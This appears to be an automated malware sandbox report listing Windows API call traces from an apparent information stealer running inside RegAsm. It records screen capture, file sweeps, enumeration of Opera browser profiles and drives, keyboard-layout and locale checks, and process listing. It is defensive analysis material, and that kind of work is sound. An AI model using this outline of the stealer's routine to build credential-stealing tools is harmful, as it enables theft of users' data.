                                                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00411DD7
                                                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00411DDE
                                                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00411DE7
                                                                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DF8
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00411E03
                                                                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411E23
                                                                                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(000000FF), ref: 00411E9D
                                                                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(000000FF), ref: 00411EAA
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00411F29
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00411F47
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00411F4E
                                                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00411F56
                                                                                                                                                                                                                                                                                                  • CloseWindow.USER32(00000000), ref: 00411F5D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSizememset
                                                                                                                                                                                                                                                                                                  • String ID: image/jpeg
                                                                                                                                                                                                                                                                                                  • API String ID: 1311022706-3785015651
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6045e70124a063fd817f36946047118938c98b6f81358632b24748c686294da3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 955233e89dab8965993365ce23471f417d3a05ebbc493c96f06fa7f3e3f93d87
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6045e70124a063fd817f36946047118938c98b6f81358632b24748c686294da3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A716CB5900218AFDB10DFE4DD45BEEBBB9EF49704F10412EFA05A3291D7386A05CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00416D2B
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00416D42
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A4), ref: 00416D7C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A8), ref: 00416D96
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8D8), ref: 00416DD4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8B8), ref: 00416DE8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416DFC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E0A
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004276AC), ref: 00416E1C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E30
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00416ED1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$1pA
                                                                                                                                                                                                                                                                                                  • API String ID: 111849568-634091350
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5b2b6f63b55e1f6505acacb7ac47ca8445766713d8ba3f9fb089b02034eb06fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2cb9bfa35f18a05ea18699b2ebf9ea07bfb25382f6a54c62d3d11893d13825a0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b2b6f63b55e1f6505acacb7ac47ca8445766713d8ba3f9fb089b02034eb06fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D751F4B5800218ABDB14EBA0CC85FEE777DAB48310F00469EFA15A3191D778A748CBE4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00426ABB,?,?,00000000), ref: 0040B0C2
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CF8,?,00000000), ref: 0040B13C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CFC,?,00000000), ref: 0040B156
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera,00426ACA,00426AC7,00426AC6,00426AC3,00426AC2,00426ABF,00426ABE,?,00000000), ref: 0040B1EB
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,?,00000000), ref: 0040B203
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera Crypto,?,00000000), ref: 0040B21B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: :$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 2567437900-1444899082
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                                                                                  • Instruction ID: efbda9057b4a3320160d0838e4bb094c7ba51aae6ab1d3ada1da399397eb047e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31528030901248EACB15EBA5C955BDDBBB99F19304F5040BEE505732D2DBB82B4CCBB6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,004020FB,?,00423330,?,00000000,00000000,?,00000000), ref: 00401446
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004014BC
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 004014D6
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,004020FB,?,00423340,?,00000000), ref: 00401603
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 004018D7
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 004018E6
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401C34
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000), ref: 00401C43
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %$L3B$\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 2707319931-1614187093
                                                                                                                                                                                                                                                                                                  • Opcode ID: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f0ecdccfbf971c4eb3ba04f5591d09edb7ba5691986d76eb2288118b31a76ee
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5726B70801248EADB15EBA5C951BDDBBB85F19308F5440BEE605732D2DF782B4CCB69
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416959
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041697E
                                                                                                                                                                                                                                                                                                  • GetDriveTypeA.KERNEL32(00000000,?,?,00000004), ref: 00416987
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004169A6
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004169C4
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004169E7
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00416A4E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                                                                                  • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                                                  • API String ID: 1884655365-147700698
                                                                                                                                                                                                                                                                                                  • Opcode ID: d7aebe20fdd1c2a3f997332edf9cf354093250a779c0c78778188edb4f5eaf6f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ef20b39a4741f89efdf50063d3a739dc061204c8983723d5aff4085e6fe27b5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7aebe20fdd1c2a3f997332edf9cf354093250a779c0c78778188edb4f5eaf6f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A961D3B1500244ABDB30EF61DC45FEE3B79AF05704F50815EF90963292DF78AA89CB69
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,00426AAF,00000000,?,00426CB0,?,?,00426AAF,?,00000004), ref: 0040A5C1
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CB4), ref: 0040A5FD
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CB8), ref: 0040A617
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,01571F38,00000000,?,?,?,00426CBC,?,?,00426AB2), ref: 0040A6AC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2567437900-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 565b7303810139da5bb3f9f41aee74555440f8ba8e901c0de02f130a5aa14c2d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37905d91ebad19cbda5eda32a3e59e51b24659bb580c75c62476da3a2a5a7917
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 565b7303810139da5bb3f9f41aee74555440f8ba8e901c0de02f130a5aa14c2d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDD18071901248EACB14EBB5C9466DDBBB9AF19344F10817EE901732D2DB785B0CCBE6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                  • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                                                                  • Opcode ID: ab2540c32def370dc3ccb5b7f219a36ccb40806ac267110b0901d9de57956097
                                                                                                                                                                                                                                                                                                  • Instruction ID: c556474e9021bd53722cce9fd1be39607c0121b4687c47c7bc64da4ab7de49f3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab2540c32def370dc3ccb5b7f219a36ccb40806ac267110b0901d9de57956097
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67317371900219EBDB10DFD9DC85BEEB7B9FB48704F50406EF605A3281DB785A84CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: wwww
                                                                                                                                                                                                                                                                                                  • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410AEF
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00410AFF
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00410B11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00410B7E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410B89
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 562399079-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C09
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00411C19
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411C2B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 00411C40
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411C62
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411744
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411753
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041175A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 869800140-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 25ec301e592552770448581482f48514acc17145e864118cceb557e7f86678fe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9115E71600219ABDB10CFA5ED85EEBB7ADEF4A351F10455AFE08C7340D671AC508AA0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
